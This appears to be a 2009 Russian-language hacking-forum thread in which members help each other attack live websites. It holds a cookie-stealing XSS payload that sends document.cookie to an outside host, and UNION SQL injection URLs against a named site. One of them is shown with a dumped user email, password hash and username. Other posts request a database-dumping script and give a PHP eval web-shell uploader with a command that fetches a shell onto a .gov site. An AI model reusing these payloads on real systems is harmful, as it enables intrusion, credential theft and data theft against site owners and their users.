Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. none222

    none222 Guest

    Reputations:
    0
    Сайт построен на АЯКС. Нашёл КСС-ку. Но когда пытаюсь отправить данные на сервер методом ПОСТ, то вылетает ошибка:
    что это может быть?


    mozarat, покажи свой запрос, что ты составляешь
     
  2. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Это ответ сервера такой, или ИЕ не может распарсить полученый XML ? (Проверь сниффером)
     
  3. none222

    none222 Guest

    Reputations:
    0
    Это ошибка браузера (там была мозилки). Вот как она выглядит в Опере:
    А ведь запрос такой-же вроде создаю, с единственной, пожалуй разницей - реферрер не тот.

    Вобщем задача - избежать ошибки, чтобы ксс выполнялась корректно
     
    #5383 none222, 12 Feb 2009
    Last edited by a moderator: 12 Feb 2009
  4. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Ну наверно надо втулить коректный xml в ответе что бы небыло ошибко. А вобше аяксом(вернее XMLHttpRequest) ты не отравишь ничего на другой хост ибо политики безопасности не дадут.
     
    #5384 AkyHa_MaTaTa, 12 Feb 2009
    Last edited: 12 Feb 2009
  5. none222

    none222 Guest

    Reputations:
    0
    так я отправлял пост-запрос на сервер не посредством XMLHttpRequest, а через простую http форму.
    Или так оно не примет и о xss можно забыть?
     
    #5385 none222, 12 Feb 2009
    Last edited by a moderator: 12 Feb 2009
  6. tmp

    tmp Banned

    Joined:
    10 Mar 2005
    Messages:
    417
    Likes Received:
    32
    Reputations:
    1
    ПРобовал на локалхосте. код вставить можно, но на сервере он не выполняется :(
    Че то я туплю :D
     
    #5386 tmp, 12 Feb 2009
    Last edited: 12 Feb 2009
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Вот. И не страница с редиректом, а страница, куда встроен javascript, который производит редирект на снифер + document.cookie

    А где размещен снифер (а не ядовитая ссылка на него в виде кода javascript) значения не имеет
     
  8. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    http://www.panelmonkey.org/category.php?id=1

    Здрасте всем . Што делот , немогу некак понять , если там вопше Sql ?
     
  9. Ghost0ff

    Ghost0ff New Member

    Joined:
    18 Nov 2008
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    есть
     
  10. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    Помагите , зделот хут кокойто запрос ...
     
  11. -m0rgan-

    -m0rgan- Elder - Старейшина

    Joined:
    29 Sep 2008
    Messages:
    514
    Likes Received:
    170
    Reputations:
    17
    http://www.panelmonkey.org/background.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7--
     
  12. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    А у тебя есть возможность изменить action? Или ты пытаешь автоформу зделать? Ну xss возможна если ты можешь встроить в страницу свой html(js) код посредством изменения каких то параметров передоваемых скрипту(грубо говоря и не вдаваясь в подробности), и если ты отправляешь форму(обычную) post на http://hacsite.ru/12.php то следуя из ошибко видно что у тебя отрпавляеться Content-type: text/xml(ну или xslt) в ответе от http://hacsite.ru/12.php но возрашаемое тело документа далеко не xml.
     
  13. Saiga

    Saiga New Member

    Joined:
    22 Jul 2008
    Messages:
    49
    Likes Received:
    2
    Reputations:
    1
    странно!

    -m0rgan-
    почемуто по твоему запросу мне показываеть токо вот што : sqldb was unable to successfully run a MySQL query.

    И на все тругие тоше самое ..
     
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Убери пробелы из урла и почитай любую статью по скулям
     
    1 person likes this.
  15. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    2 Saiga

    http://www.panelmonkey.org/background.php?id=-1/**/UNION/**/SELECT/**/1,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,email,id,password,username),0x71),0x71),3,4,5,6,7/**/FROM/**/punbb_users/**/LIMIT/**/1,1--

    [email protected]:2:8d078be183b8a05eb74256465e9a507ad5c825f3:TPS Pineapple



    работай лимитом и всё у тебя получится
     
    #5395 Gorev, 12 Feb 2009
    Last edited: 12 Feb 2009
    2 people like this.
  16. mozarat

    mozarat New Member

    Joined:
    10 Feb 2009
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Код присутствующий на странице такой:
    PHP:
    <script>img = new Image(); img.src "http://na-s.ru/images/mozarat_1.gif?"+document.cookie;</script>
    Это в .html

    Или еще в .js
    PHP:
    img = new Image(); img.src "http://na-s.ru/images/mozarat_1.gif?"+document.cookie;
    Xss активная прописывается в сообщении. Сайт выполняет код с заданой ссылки(сайта).
    Ставил снииффер на lcoalhoste и сайт (двиг самописаный), и куки приходят нормальные.
     
  17. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Это,люди,вот такой код:

    require "./start.php";
    require $site_dir."/include/security.php";

    if ($HTTP_POST_VARS["editor_mode"] || $HTTP_GET_VARS["editor_mode"] || $HTTP_COOKIE_VARS["editor_mode"] == "editor") {
    func_header_location("error_message.php?access_denied&id=3");
    }

    if (isset($editor_mode))
    unset($editor_mode);

    x_session_register("editor_mode");

    Возможна ли здесь ансет атака,даже если она ничего не даёт :Д
     
  18. zenon2

    zenon2 New Member

    Joined:
    25 Oct 2006
    Messages:
    9
    Likes Received:
    0
    Reputations:
    0
    Народ поскажите какой небудь скриптик что бы слить базу под 50K записей.
    Проблема в том что чтобы добраться до sql inj надо авторизация на сайте. Без этого к данной sql inj доступа нет. Единственный вариант сливать руками через IE и LIMIT, что никак не хочется :) Извините если попал в offtop
     
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    всю базу со всеми колонками? Через скулю? Можно в теории, но слишком долго будет и серв может загнуться, кроме того в логах сервера столько будет гавна)))
     
  20. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196
    Не делай никогда system() - это нерациоанально,
    делай eval(). system() не всегда работает и если magic quotes on -то ничего ты не сделаешь....

    А eval дает гибкость большую - твой код всегда выполинться даже при magic quotes on (правда с финтами некоторыми =) ) Кроме того, всегда можно сделать и так -если хочешь - eval('system();')


    в твоем случае делай так - залий аплоадер простенький - <?php eval($_GET[id]);?> и потом юзай так

    site.gov/cmd.php?id=copy('http://xakersite.ru/shell.txt','shell.php');
     
Thread Status:
Not open for further replies.